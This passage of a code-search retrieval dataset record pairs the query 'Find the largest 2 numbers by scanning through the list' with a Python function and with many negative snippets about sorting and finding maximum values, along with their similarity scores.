first_index += 1\n list_index += 1\n\n for i in range(first_index, len(first_half)):\n num_list[list_index] = first_half[first_index]\n list_index += 1\n first_index += 1\n\n for x in range(second_index, len(second_half)):\n num_list[list_index] = second_half[second_index]\n list_index += 1\n second_index += 1", "def max_heapify(lst, n, root):\n\n largest = root\n l = 2 * root + 1\n r = 2 * root + 2\n\n if l < n and lst[l] > lst[largest]:\n largest = l\n if r < n and lst[r] > lst[largest]:\n largest = r\n if largest != root:\n lst[root], lst[largest] = lst[largest], lst[root]\n max_heapify(lst, n, largest)", "def find_largest_diff(list_of_nums):\n largest_diff = 0\n for i in range(len(list_of_nums) - 1):\n diff = abs(list_of_nums[i] - list_of_nums[i+1])\n if diff > largest_diff:\n largest_diff = diff\n\n return largest_diff", "def msort(mylist):\n comparision_count = 0\n if len(mylist)>1:\n # Dividing the list\n mid_point = len(mylist)//2\n leftlist = msort(mylist[: mid_point])\n rightlist = msort(mylist[mid_point:])\n\n # Merging the results\n merged_results = merge(leftlist[0],rightlist[0])\n comparision_count = comparision_count + merged_results[1]\n return (merged_results[0], comparision_count )\n else:\n return (mylist,comparision_count)", "def calculate(numbers):\n old_lst = numbers[::]\n selection_sort(numbers)\n if len(numbers) % 2 == 1:\n median = numbers[len(numbers) // 2]\n else:\n median = (numbers[len(numbers) // 2] + numbers[(len(numbers) // 2) - 1]) / 2\n average = sum(numbers) / len(numbers)\n\n return old_lst, len(numbers), sum(numbers), min(numbers), max(numbers), \\\n average, median", "def test_swap_k_max(self):\r\n self.num2 = [1, 2, 3, 4, 5, 6]\r\n a1.swap_k(self.num2, len(self.num2)//2)\r\n self.assertEqual(self.num2, [4, 5, 6, 1, 2, 3])", "def tred(t):\n\n t2 = t\n\n l = []\n l2 = t2.pop()\n l1 = t2.pop()\n\n for i in range(len(l1)):\n l.append(l1[i] + max(l2[i:i+2]))\n\n t2.append(l)\n return t2", "def nmax(num, T, nwords):\n values = []\n top_n = T.argsort()[-num:][::-1]\n for n in top_n:\n nwords.append(((data['all_words'][n])))\n values.append(round(T[n],3))\n return nwords", "def get_big_joker_value(deck: List[int]) -> int:\n return max(deck)", "def v6_multimax(iterable):\n maximums = []\n for item in iterable:\n if not maximums or maximums[0] == item:\n maximums.append(item)\n elif item > maximums[0]:\n maximums = [item]\n return maximums", "def mysort(lst: List[T], compare: Callable[[T, T], int]) -> List[T]:\n temp = lst\n switched = True\n while switched:\n switched = False\n for i in range(len(temp) - 1):\n if compare(temp[i], temp[i + 1]) == 1:\n temp[i], temp[i + 1] = temp[i + 1], temp[i]\n switched = True\n\n return temp", "def main():\n\n s = set()\n\n while True:\n n = input('Enter a number: ')\n if n == -99:\n break\n\n s.add(n)\n\n l = list(s)\n\n if len(l) < 2:\n print 'sorry but the list is too small'\n exit(1)\n\n l.sort()\n print 'The second largest number is', l[-2]", "def largest_product(digits, size):\n # Why does a blank set of digits have a maximum product of 1?\n slice_list = slices(digits, size)\n def mult_reduce(items):\n total = 1\n for i in items:\n total *= i\n return total\n slice_list = [mult_reduce(l) for l in slice_list]\n return max(slice_list)", "def lab10_q3():\n return \"\"\"\n Use list comprehension max(lst_of_qvm, key=lambda qvm : total_revenue(qvm))\n\tThis makes each element of the list go through the key which gives total_revenue for each one. Then just get the max in that list\n \"\"\"", "def method2(self, nums):\n N = len(nums)\n inc = 1\n dec = 1\n \n for i in range(1, N):\n if nums[i] > nums[i - 1]:\n dec = inc + 1\n elif nums[i] < nums[i - 1]:\n inc = dec + 1\n \n return max(inc, dec)", "def nth_largest(a_list, n):\n if n < 1:\n return\n n -= 1 # 0 indexing\n\n pivot = a_list[-1]\n\n bigger = -1\n print a_list\n for i in range(len(a_list)-1):\n if a_list[i] > pivot:\n a_list[bigger+1], a_list[i] = a_list[i], a_list[bigger+1]\n bigger += 1\n # swap pivot with bigger+1 element\n a_list[bigger+1], a_list[-1] = a_list[-1], a_list[bigger+1]\n print a_list\n print bigger\n print n\n\n if n == bigger+1:\n return a_list[n]\n elif n < bigger+1: # element in left sub array\n return nth_largest(a_list[:bigger+1], n+1)\n elif n > bigger+1: # element in right sub array\n return nth_largest(a_list[bigger+2:], n+1-len(a_list[:bigger+2]))", "def highestMax(requestContext, seriesList, n):\n result_list = sorted( seriesList, key=lambda s: max(s) )[-n:]\n\n return sorted(result_list, key=lambda s: max(s), reverse=True)", "def fn(lo, hi):\n if lo == hi: return piles[lo]\n return max(piles[lo] - fn(lo+1, hi), piles[hi] - fn(lo, hi-1))", "def sort(self): # sort all entries to make room for new ones, determine best and worst\n ns = self.num_stored.value\n ys = np.asarray(self.ys[:ns])\n yi = ys.argsort()\n sortRuns = []\n for i in range(len(yi)):\n y = ys[yi[i]]\n xs = self.get_x(yi[i])\n sortRuns.append((y, xs))\n numStored = min(len(sortRuns),int(0.9*self.capacity)) # keep 90% best \n for i in range(numStored):\n self.replace(i, sortRuns[i][0], sortRuns[i][1])\n self.num_sorted.value = numStored \n self.num_stored.value = numStored \n return numStored", "def get_top_n_motif_scores(score_list,top_n):\r\n\treturn score_list.argsort()[-top_n:],score_list[score_list.argsort()[-top_n:]]", "def mysort(lst: List[T], compare: Callable[[T, T], int]) -> List[T]:\n for i in range(1, len(lst)): #loops through each element starting at the second one\n for j in range(i, 0, -1): #loops through each element coming before i starting at i and going backwards\n if compare(lst[j], lst[j-1]) < 0: #checks to see if the previous element is smaller than the current (by saying <0 we keep the sort stable as well)\n lst[j], lst[j-1] = lst[j-1], lst[j] #if they are, we switch them\n else:\n break #if they are not, we know that the element is in its proper place\n return lst", "def robSingle_2(self, nums, start, end):\n # print((start, end))\n # print(nums[start: end + 1])\n curMax = 0\n preMax = 0\n for num in nums[start:end + 1]:\n preMax, curMax = curMax, max(curMax, preMax + num)\n # print(curMax)\n # print(\"####################################\")\n return curMax", "def wiggle_sort(nums):\n\n for i in range(len(nums)):\n if (i % 2 == 1) == (nums[i - 1] > nums[i]):\n nums[i - 1], nums[i] = nums[i], nums[i - 1]", "def calc_median(numbers):\n middle_index = len(numbers) // 2\n return sorted(numbers[middle_index]) # sorted returns the numbers sorted without changing" ]
[ "0.6987764", "0.685001", "0.66746044", "0.66537255", "0.6615918", "0.66083395", "0.6553763", "0.64379936", "0.64302796", "0.6412502", "0.6391118", "0.63837785", "0.6367723", "0.6360329", "0.633378", "0.6331884", "0.63131255", "0.6293756", "0.628999", "0.6283172", "0.6250778", "0.622592", "0.6221877", "0.61929554", "0.617386", "0.6142375", "0.6129786", "0.6127789", "0.6103437", "0.6090518", "0.6084688", "0.60507387", "0.6048664", "0.6022701", "0.5995499", "0.59847677", "0.5979381", "0.5933823", "0.59312403", "0.5930939", "0.5930768", "0.59303266", "0.5928497", "0.5917425", "0.5898493", "0.5861299", "0.5854563", "0.5845493", "0.58239347", "0.58131784", "0.58048135", "0.57988006", "0.5795246", "0.5788245", "0.5784666", "0.5778629", "0.57668626", "0.5746271", "0.57438767", "0.5739903", "0.57369626", "0.5718114", "0.5711964", "0.5709532", "0.5704639", "0.57035416", "0.57016057", "0.5685936", "0.56821376", "0.5675288", "0.5658732", "0.56565", "0.565557", "0.56548667", "0.56520444", "0.56345356", "0.56224394", "0.5617801", "0.561509", "0.56090987", "0.5599736", "0.5598663", "0.55984807", "0.559203", "0.5591292", "0.5588946", "0.55803746", "0.55731016", "0.55640143", "0.55615807", "0.55564857", "0.55532223", "0.55405104", "0.55280244", "0.55238616", "0.5521784", "0.55211353", "0.5520827", "0.5518126", "0.55111474" ]
0.7739796
0
Find the largest 2 numbers by scanning through the list
def max_pairwise_product_fast(numbers): num_list = numbers.copy() max_num_1 = max(num_list) num_list.remove(max_num_1) max_num_2 = max(num_list) ans = max_num_1*max_num_2 return ans
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def max_in_list(list):\n x=list[0] #set x be the first number in the list\n for i in range(0,len(list)):#go over the number in the list\n if x<=list[i]: #if the second one is bigger than the first\n x=list[i] #assign x to the bigger one\n else:\n continue#repeat until find the max number\n return x", "def find_greatest_number(incoming_list):\n #magiclownumber= none\n #retval= magiclownumber\n #for value in incoming_list:\n #if not retval:\n #retval = value\n # if value> retvale\n #retval= value\n #return retval\n greatest_number = max(incoming_list)\n return greatest_number", "def two_largest(inlist):\n largest = second_largest = 0\n it1 = it2 = 0\n\n for i,item in enumerate(inlist):\n if item > largest:\n largest = item\n it1 = i\n elif largest > item > second_largest:\n second_largest = item\n it2 = i\n # Return the results as a tuple\n return largest, it1, second_largest, it2", "def find_greatest_number(incoming_list):\n retval = max(incoming_list)\n return retval", "def find_greatest_number(incoming_list: list):\n return max(incoming_list)", "def second_largest(number_list):\n for i in range(len(number_list)):\n for j in range(len(number_list) - 1 - i):\n if number_list[j] > number_list[j+1]:\n number_list[j + 1], number_list[j] = number_list[j], number_list[j+1]\n\n return number_list[-2]", "def greatest_difference(num_list):", "def largest_number_at_least_twice_of_others2(nums: [int]) -> int:\n if len(nums) == 1:\n return 0\n\n max_index = nums.index(max(nums))\n max_val = nums.pop(max_index)\n next_max = max(nums)\n\n if next_max * 2 <= max_val:\n return max_index\n return -1", "def find_greatest_number(incoming_list):\n #return_value = max(incoming_list)\n #return return_value\n\n MAGIC_LOW_NUMBER = None\n retval = MAGIC_LOW_NUMBER\n\n # 1,2,3,4,5,1\n # MAGIC_LOW_NUMBER, 1 ->STORE 1\n #1 , 2 ->STORE 2\n #2, , 3 ->STORE 3\n #3, , 4 ->STORE 4 \n #4, , 5 ->STORE 5\n #5, , 1 ->??? nothing \n for value in incoming_list:\n if not retval:\n retval = value\n if value > retval:\n retval = value", "def findSecondLargest(self):\n l = []\n self.flatten(l)\n print(l)\n print(l[-2])", "def find_largest_number_in_list(self, list_with_numbers):\n return 0", "def second_largest(values: List[int]) -> int:\n try:\n return sorted(set(values))[-2]\n except IndexError:\n raise ValueError(\"second_largest() needs at least two distinct values\")", "def my_max(in_list):\n biggest = in_list[0]\n for l in in_list:\n if l > biggest:\n biggest = l\n return biggest", "def largest_two():\n # Add your code below!", "def get_max_loot(input_list):\n even = sum(input_list[::2])\n odd = sum(input_list[1::2])\n return even if even > odd else odd", "def largest_item(list):\n pass", "def max_num(num_list):\n\n return max(num_list)", "def find_largest_element(num_1, num_2, num_3):\n\n return max([num_1, num_2, num_3])", "def list_max(numbers):\n maxnum = 0\n \n for num in numbers[0:]:\n if num > maxnum:\n maxnum = num\n return maxnum", "def largest(n,xs):\n return sorted(xs, reverse = True)[:n][::-1]", "def nth_largest2(a_list, n):\n a_list.sort()\n new_list = a_list[::-1]\n return new_list[n-1]", "def max(self, num_list):\n try:\n max = int(num_list[0])\n\n for number in num_list:\n try:\n if number > max:\n max = number\n except Exception as e:\n print(\"Error\", e)\n\n except Exception as e:\n print(\"Error:\", e)\n\n return max", "def max_pairwise_product_sort(numbers):\n sorted_list = sorted(numbers)\n ans = sorted_list[-1]*sorted_list[-2]\n return ans", "def find_max(ls):\n\n if len(ls) == 1:\n return ls[0]\n elif len(ls) == 2:\n return ls[0] if ls[0] > ls[1] else ls[1]\n else:\n mid = len(ls) // 2\n m1 = find_max(ls[0:mid])\n m2 = find_max(ls[mid:])\n return m1 if m1 > m2 else m2", "def highest_product_2(arr):\n\n # make a list to store the highest three ints, initializing to first three\n maxes = [arr[0], arr[1], arr[2]]\n\n # find the lowest of the highest three ints\n lowest_max = min(maxes)\n\n # go through the rest of the list to check for higher values\n for num in arr[3:]:\n # if any value is higher than the lowest max, update maxes list\n if num > lowest_max:\n # remove the old maximum\n maxes.remove(lowest_max)\n # add the new one\n maxes.append(num)\n # recalculate the lowest max for continued comparison\n lowest_max = min(maxes)\n\n return maxes[0] * maxes[1] * maxes[2]", "def largest_number_at_least_twice_of_others(nums: [int]) -> int:\n largest = None\n next_largest = None\n\n for idx, num in enumerate(nums):\n if largest is None:\n largest = idx\n continue\n if num > nums[largest]:\n next_largest = largest\n largest = idx\n continue\n if next_largest is None or num > nums[next_largest]:\n next_largest = idx\n\n if next_largest is None or (nums[next_largest] * 2) <= nums[largest]:\n return largest\n return -1", "def nextMax(value,lista):\n for i in lista:\n if i>value:\n return i\n raise NameError('No value')", "def question_24(list_num: int) -> int:\n return max(list_num, key=list_num.count)", "def main():\n\n s = set()\n\n while True:\n n = input('Enter a number: ')\n if n == -99:\n break\n\n s.add(n)\n\n l = list(s)\n\n if len(l) < 2:\n print 'sorry but the list is too small'\n exit(1)\n\n l.sort()\n print 'The second largest number is', l[-2]", "def maxNumber(x):\n maxVal = x[0]\n for num in x:\n if maxVal <num:\n maxVal=num\n return maxVal", "def largest_int(numbers):\n\n if numbers == []:\n return \n max_int = numbers[0]\n for number in numbers:\n if number > max_int:\n max_int = number\n \n return max_int", "def max(input: list[int]) -> int:\n i = 0\n if len(input) == 0:\n raise ValueError(\"max() arg is an empty List\")\n\n else:\n while i < len(input):\n j = i + 1\n while j < len(input):\n if input[i] > input[j]:\n if j == len(input) - 1:\n if input[i] >= input[len(input) - 1]:\n return input[i]\n j += 1\n else:\n j += len(input)\n i += 1\n return input[len(input) - 1]", "def max_num_in_list(a_list):\n max_number = max(a_list)\n return max_number", "def max_(lst: Iterable[int]) -> int:\n return reduce(lambda x, y: x if x > y else y, lst)", "def max(input: list[int]) -> int:\n if len(input) == 0:\n raise ValueError(\"max() arg is an empty List\")\n else:\n input.sort()\n return input[-1]", "def method2(self, nums):\n N = len(nums)\n inc = 1\n dec = 1\n \n for i in range(1, N):\n if nums[i] > nums[i - 1]:\n dec = inc + 1\n elif nums[i] < nums[i - 1]:\n inc = dec + 1\n \n return max(inc, dec)", "def main(num, li1, list2):\n li1 = [[float(input()), float(input())] for i in range(num)]\n list2 = [li1[i][1]/li1[i][0] for i in range(num)]\n li1.sort(key=lambda x: x[0])\n for i in range(num):\n if li1[i][1]/li1[i][0] == max(list2):\n return print(\"%.2f %.2f\"%(li1[i][0], li1[i][1]))", "def largestNumber(self, nums): \n def string_comp(item1, item2):\n return 1 if str(item1) + str(item2) < str(item2) + str(item1) else -1\n res_list = sorted(nums, key=cmp_to_key(string_comp))\n\n # Catch edge case where list of 0s will produce \"000..\" instead of a single \"0\"\n if set(res_list) == {0}:\n return \"0\"\n return \"\".join([str(i) for i in res_list])", "def max(input: list[int]) -> int:\n if len(input) == 0:\n raise ValueError(\"max() arg is an empty List\")\n most: int = input[0]\n n: int = 1\n while n < len(input):\n if input[n] > most:\n most = input[n]\n n += 1 \n return most", "def robSingle_2(self, nums, start, end):\n # print((start, end))\n # print(nums[start: end + 1])\n curMax = 0\n preMax = 0\n for num in nums[start:end + 1]:\n preMax, curMax = curMax, max(curMax, preMax + num)\n # print(curMax)\n # print(\"####################################\")\n return curMax", "def my_max(*args):\n def sorter(sequence):\n \"\"\"\n This function find max in given sequence of simple numbers\n \"\"\"\n def bubble_sort(a):\n \"\"\"\n This function sort the list\n \"\"\"\n for i in reversed(range(len(a))):\n for j in range(1, i + 1):\n if a[j-1] > a[j]:\n a[j], a[j-1] = a[j-1], a[j]\n return a\n\n listed_seq = list(sequence)\n for number in listed_seq:\n if not isinstance(number, int):\n raise ValueError(\"Can't find max, wrong data format\")\n return bubble_sort(listed_seq)[-1]\n\n if not args:\n raise ValueError(\"Can't find max, no data given\")\n if len(args) == 1:\n thing = args[0]\n if isinstance(thing, (list, tuple)):\n return sorter(thing)\n if isinstance(thing, int):\n return thing\n raise ValueError(\"Can't find max, wrong data format\")\n return sorter(args)", "def find_max(list):\n return find_value_at(list, 0)", "def largest_ten(list1):\n result = []\n for i in range(10):\n max1 = list1[0]\n for j in list1:\n if max1 < j:\n max1 = j\n result.append(max1) ##the final target is the max1 when finishing this loop\n list1.remove(max1)\n\n return result", "def largest(*args):\r\n if len(args) == 2:\r\n a, b = args\r\n return switch(a > b, a, b)\r\n else:\r\n return max(stack(*args), axis=0)", "def find_largest_diff(list_of_nums):\n largest_diff = 0\n for i in range(len(list_of_nums) - 1):\n diff = abs(list_of_nums[i] - list_of_nums[i+1])\n if diff > largest_diff:\n largest_diff = diff\n\n return largest_diff", "def get_longest_all_primes(lst: list[int]):\n subsecventa_max1 = []\n for i in range(len(lst)):\n for j in range(len(lst)):\n if toate_elementele_prime(lst[i:j + 1]) and len(lst[i:j + 1]) > len(subsecventa_max1):\n subsecventa_max1 = lst[i:j + 1]\n return subsecventa_max1", "def max(l):\n if l:\n s_list = sorted(l)\n return s_list[-1]\n else:\n raise ValueError(\"list empty\")", "def max_val(t):\n # Your code here\n\n def openItem(term):\n newList = []\n\n for item in term:\n if type(item) == int:\n newList.append(item)\n\n else:\n newList += openItem(item)\n\n return newList\n\n sortingList = openItem(t)\n\n maximum = sortingList[0]\n\n for item in sortingList:\n if maximum < item:\n maximum = item\n\n return maximum", "def test_find_second_largest(self):\n secondLargestValue = sorted(self.values)[-2]\n valueFound = self.tree.findSecondLargest(self.tree.root)\n self.assertEquals(secondLargestValue, valueFound)", "def maxi(a,b):\n\tif a > b: \n\t\treturn a\n\treturn b", "def getMax(array_list):\n m = array_list[0]\n m_index = 0\n for i,value in enumerate(array_list):\n if value > m:\n m = value\n m_index = i\n return (m_index,m)", "def give_greatest_spart(cls, spart_list):\n if len(spart_list) == 1:\n return spart_list[0]\n sorted_list = cls.sort_by_dominance(spart_list)\n if not(sorted_list[0] > sorted_list[1]):\n print(\"The two largest elements are non-comparable\")\n return []\n else:\n return sorted_list[0]", "def maximum(some_list):\n return max(some_list)", "def max_index_of_smaller_number(list, number):\n for i, element in enumerate(list):\n if element >= number:\n return i - 1", "def get_max(num_one, num_two):\n temp_a = int(str(num_one) + str(num_two))\n temp_b = int(str(num_two) + str(num_one))\n if temp_a >= temp_b:\n return num_one\n else:\n return num_two", "def maxn(a,b):\n\n if a>b:\n return a\n else:\n return b", "def find_max_numb(x,y):\n if x > y:\n print(x, \" - is max number.\")\n return x \n else:\n print(y, \" - is max number.\")\n return y", "def find_max(data):\n index = 0\n res = data[index]\n for i in range(1, len(data)):\n if data[i] > res:\n res = float(data[i])\n index = i\n else:\n break\n return res, index", "def robSingle(self, nums, start, end):\n # print((start, end))\n # print(nums[start: end])\n curMax = 0\n preMax = 0\n for num in nums[start:end]:\n preMax, curMax = curMax, max(curMax, preMax + num)\n # print(curMax)\n # print(\"####################################\")\n return curMax", "def max_info(lst):\n k = []\n maxm = -1\n for i in range(len(lst)):\n if lst[i] == maxm:\n k.append(i)\n if lst[i] > maxm:\n maxm = lst[i]\n k = [i]\n return k", "def return_max(lst, highest=None):\n if highest is None and len(lst) > 0:\n highest = lst[0]\n if len(lst) <= 1:\n return highest\n highest = max(highest, lst[0])\n return return_max(lst[1:], highest)", "def maxVal(item_list, rem_space):\n if item_list == [] or rem_space == 0: # no items or space\n result = (0, ())\n else:\n next_item = item_list[0]\n if next_item.getCost() > rem_space:\n result = maxVal(item_list[1:], rem_space)\n else:\n with_val, with_list = maxVal(item_list[1:],\n rem_space-next_item.getCost())\n with_val += next_item.getValue()\n\n without_val, without_list = maxVal(item_list[1:],\n rem_space)\n if with_val > without_val:\n result = (with_val, with_list + (next_item, ))\n else:\n result = (without_val, without_list)\n return result", "def max_list_iter(int_list): # must use iteration not recursion\n if int_list == None:\n raise ValueError(\"Must be list\")\n else:\n if len(int_list) < 1:\n return None\n max = int_list[0]\n for val in int_list:\n if val > max:\n max = val\n return max", "def find_max_val_unimodal_arr(unimodal_arr):\n arr = unimodal_arr\n maxfound = False\n if (len(arr) == 0):\n print('empty list')\n return -1\n\n center = math.floor(len(arr)/2)\n left = (math.floor(len(arr)/2)-1) if (math.floor(len(arr)/2)-1) >= 0 else 0\n right = (math.floor(len(arr)/2)+1) if (math.floor(len(arr)/2)+1) <= (len(arr)-1) else (len(arr)-1)\n\n if (len(arr) == 1):\n print('maximum value = ' + str(arr[center]))\n return arr[center]\n\n if (len(arr) == 2):\n print('maximum value = ' + str(arr[left] if arr[left] > arr[right] else arr[right]))\n return arr[left] if arr[left] > arr[right] else arr[right]\n\n while (not maxfound):\n if (arr[left] > arr[center]):\n arr = arr[:center]\n center = math.floor(len(arr)/2)\n left = (math.floor(len(arr)/2)-1) if (math.floor(len(arr)/2)-1) >= 0 else 0\n right = (math.floor(len(arr)/2)+1) if (math.floor(len(arr)/2)+1) <= (len(arr)-1) else (len(arr)-1)\n if (arr[right] > arr[center]):\n arr = arr[center:]\n center = math.floor(len(arr)/2)\n left = (math.floor(len(arr)/2)-1) if (math.floor(len(arr)/2)-1) >= 0 else 0\n right = (math.floor(len(arr)/2)+1) if (math.floor(len(arr)/2)+1) <= (len(arr)-1) else (len(arr)-1)\n if ((arr[right] <= arr[center]) and (arr[left] <= arr[center])):\n maxfound = True\n\n print('maximum value = ' + str(arr[center]))\n return arr[center]", "def most_popular_binary(lst_sorted):\n for l in range(1, 11):\n print(l, lst_sorted[-l])", "def get_sum_of_greatest_elements(my_list, x):\r\n result = []\r\n for i in range(0, x):\r\n max1 = 0\r\n for j in range(len(my_list)):\r\n if my_list[j] > max1:\r\n max1 = my_list[j]\r\n my_list.remove(max1)\r\n result.append(max1)\r\n\r\n count = 0\r\n for x in result:\r\n count += x\r\n return count", "def findKthLargest(self, nums: List[int], k: int) -> int:\n return sorted(nums)[-k]", "def max_list_iter(int_list): # must use iteration not recursion\n if int_list == None: # error handling\n raise ValueError\n elif len(int_list) == 0: # when the list is empty\n return None\n else:\n max_num = int_list[0]\n for num in int_list:\n if num > max_num:\n max_num = num\n return max_num", "def twoMaxs(lnp):\n\tindex1 = 0\n\tindex2 = 0\n\tcnt = 0\n\tmaxArea = 0\n\tmaxArea2 = 0\n\tfor (ex, ey, ew, eh) in lnp:\n\t\tif(ew * eh >= maxArea):\n\t\t\tindex1 = cnt\n\t\t\tmaxArea = ew * eh\n\t\tcnt += 1\n\t\n\n\tcnt = 0\n\tfor (ex, ey, ew, eh) in lnp:\n\t\tif(index1 == cnt):\n\t\t\tcnt += 1\n\t\t\tcontinue\n\t\tif(ew * eh >= maxArea2):\n\t\t\tindex2 = cnt\n\t\t\tmaxArea2 = ew * eh\n\t\tcnt +=1\n\t\n\treturn (index1, index2)", "def max_val_rec(alist):\n ln = len(alist)\n mid = ln//2\n if ln > 2:\n left = max_val_rec(alist[:mid])\n right = max_val_rec(alist[mid:])\n return left if left > right else right\n else:\n return max(alist)", "def finger(numbers):\n \n greater = 0 #storing largest number\n \n for i in numbers:\n if i%2 != 0 and i > greater: #check if odd and if larger than greater\n greater = i\n \n if greater == 0: # True if none are odd, greater var not changed\n return 'None of the numbers entered are odd.'\n \n return 'The largest odd number is: ' + str(greater)", "def maximumProduct2(self, nums: List[int]) -> int:\n big_1 = big_2 = big_3 = -float(\"inf\")\n small_1 = small_2 = float(\"inf\")\n for n in nums:\n if n >= big_1:\n big_1, big_2, big_3 = n, big_1, big_2\n elif n >= big_2:\n big_2, big_3 = n, big_2\n elif n >= big_3:\n big_3 = n\n \n if n <= small_1:\n small_1, small_2 = n, small_1\n elif n <= small_2:\n small_2 = n\n \n return max(big_1 * big_2 * big_3, big_1 * small_1 * small_2)", "def personal_best(scores: list) -> int:\n return max(scores)", "def get_longest_prime_digits(lst: list[int]) -> list[int]:\r\n lst1 = []\r\n count = 0\r\n maxi = 0\r\n x = 0\r\n for i in range(len(lst)):\r\n if lst[i] > 0:\r\n if get_longest_prime_digits_for_one(lst[i]):\r\n count += 1\r\n if count > maxi:\r\n maxi = count\r\n x = i + 1\r\n else:\r\n count = 0\r\n for i in range(x - maxi, x):\r\n lst1.append(int(lst[i]))\r\n return lst1", "def find_largest_adjacent_difference(nums):\n pass", "def max_profit(l: list) -> int:\n smallest = float(\"inf\")\n largest_profit = 0\n for x in l:\n smallest = min(smallest, x)\n largest_profit = max(x - smallest, largest_profit)\n\n return largest_profit", "def find_largest_smaller_than(nums, xnumber):\n\n # Win fast\n if nums[-1] < xnumber:\n return nums[-1]\n\n # Fail fast\n if nums[0] > xnumber:\n return None\n\n # Minimum and maximum indices\n min = 0\n max = len(nums) - 1\n\n while max - min > 0:\n\n # Bisect the list\n # We add one to bisect on the right side if list has an even length\n # For example a list of length 4 would get cut at index 2 instead of 1\n mid = ((max - min) + 1)/2 + min\n\n if nums[mid] > xnumber:\n max = mid - 1\n elif nums[mid] < xnumber:\n min = mid\n\n # Case when nums[mid] == xnumber\n else:\n return nums[mid-1]\n\n return nums[min]", "def max_list_iter(int_list): # must use iteration not recursion\n\n if int_list is None:\n raise ValueError\n\n if not int_list:\n return None\n\n if len(int_list) == 1:\n return int_list[0]\n\n max_so_far: object = int_list[0]\n for i in range(len(int_list)):\n if int_list[i] > max_so_far:\n max_so_far = int_list[i]\n\n return max_so_far", "def maximo(arr):\n maxVal = float('-inf')\n maxIdx = -1\n\n for i in range(len(arr)):\n if arr[i] > maxVal:\n maxVal = arr[i]\n maxIdx = i\n\n return maxVal, maxIdx", "def get_max_salary(n, numbers):\n temp_n = n\n result = \"\"\n while temp_n != 0:\n max_num = numbers[0]\n temp_index = 0\n for i in range(0, n):\n max_num = get_max(max_num, numbers[i])\n if(max_num == numbers[i]):\n temp_index = i\n result += str(max_num)\n numbers[temp_index] = 0\n temp_n -= 1\n print(result)", "def largestV(a, b, x):\n v = a - 1\n while (binom(v, b) > x):\n v -= 1\n return v", "def largest_odd_times(L):\n \n l = []\n for i in set(L):\n if L.count(i) % 2 > 0:\n l.append(i)\n \n if l:\n return max(l)", "def max_list_iter(int_list): # must use iteration not recursion\n if int_list == []:\n return None\n elif int_list == None:\n raise ValueError\n max_int = int_list[0]\n \n for i in int_list:\n if i > max_int:\n max_int = i\n return max_int", "def find_best(counters):\n # result_list = []\n max_val = 0\n for counter in counters:\n if counter[3] >= max_val:\n max_val = counter[3]\n result_list = [counter for counter in counters if counter[3] == max_val]\n\n result_list = sorted(result_list, key=lambda x: (x[0], x[1]))\n\n return f'Best performance by: {result_list[0][2]}'", "def main():\n greatest = 0\n for i in range(1000, 100, -1):\n for j in range(i, 100, -1):\n palindrome = str(j*i)\n if ((palindrome == palindrome[::-1]) and (j*i) > greatest):\n greatest = j*i\n\t\t\t\n return greatest", "def max_profit(prices: List[int]) -> int:", "def recurrent_max_value_in_list(lst, max_value):\n if len(lst) == 0:\n return max_value\n elif lst[0] > max_value:\n max_value = lst[0]\n return recurrent_max_value_in_list(lst[1:], max_value)", "def maximumToys(moneyAvailable, priceList):\n priceList.sort()\n count = 0\n for toyPrice in priceList:\n if toyPrice <= moneyAvailable:\n count += 1\n moneyAvailable -= toyPrice\n else:\n return count", "def GetMax(val, maximum):\n\tval = float(val)\n\tmaximum = float(maximum)\n\treturn max([val, maximum])", "def personal_best(scores):\n# return sorted(scores, reverse=True)[0]\n return max(scores)", "def argmax(x):\n def op(a, b):\n comp = (a[1] > b[1])\n return comp.if_else(a[0], b[0]), comp.if_else(a[1], b[1])\n return tree_reduce(op, enumerate(x))[0]", "def argmax(x):\n def op(a, b):\n comp = (a[1] > b[1])\n return comp.if_else(a[0], b[0]), comp.if_else(a[1], b[1])\n return tree_reduce(op, enumerate(x))[0]", "def findPeakElement2(self, nums: List[int]) -> int:\n nums.insert(0, -float('inf'))\n nums.append(-float('inf'))\n l, r = 0, len(nums)\n\n while l < r:\n mid = l + (r - l) // 2\n if nums[mid] > nums[mid-1] and nums[mid] > nums[mid+1]:\n return mid - 1\n \n elif nums[mid] <= nums[mid-1] and nums[mid] <= nums[mid+1]:\n r = mid \n elif nums[mid-1] <= nums[mid] <= nums[mid+1]:\n l = mid\n elif nums[mid-1] >= nums[mid] >= nums[mid+1]:\n r = mid\n return l", "def calculate_greatest(self):\n greatest = 0\n for resourceList in self.loading.values():\n for time, use in resourceList:\n if use > greatest:\n greatest = use\n self.emit(\"greatest_calculated\",greatest)\n return greatest", "def maxi(a, b):\n return max(a, b)", "def r_max(nxs):\n largest = None\n for i,e in enumerate(nxs):\n if type(e) == type([]):\n val = r_max(e)\n else:\n val = e\n\n if i == 0 or val > largest:\n largest = val\n\n return largest", "def largest(array, n):\n\n #set max as first array element\n max = array[0]\n\n #compare current max with next array element, replace max if next element is larger\n\n for i in range(1, n):\n if array[i] > max:\n max = array[i]\n return max", "def fuction_call(chest):\n\n for i in chest:\n max_i = maximum(chest,i)\n if max_i >= 2:\n print(\"The maximum size of a set Matyoshka Dolls with outermost doll\",i,\"is\",max_i)", "def four():\r\n \r\n i = 999\r\n j = i\r\n largest = 0\r\n \r\n while i > 0:\r\n while j > 0:\r\n number = str(i * j)\r\n forward = str(number)\r\n reverse = \"\"\r\n for char in number:\r\n reverse = char + reverse\r\n if forward == reverse:\r\n if largest < i * j:\r\n largest = i * j\r\n break\r\n else:\r\n j = j - 1\r\n i = i - 1\r\n j = i\r\n return largest", "def largestPrimeFactor(number):\n factorlist = primeFactors(number)\n maximumfactor = max(factorlist)\n return maximumfactor", "def max_list_iter(int_list): # must use iteration not recursion\n max = \"blank\"\n if int_list is None:\n raise ValueError\n elif len(int_list) == 0:\n return None\n for i in int_list:\n if max == \"blank\":\n max = i\n elif i > max:\n max = i\n return max" ]
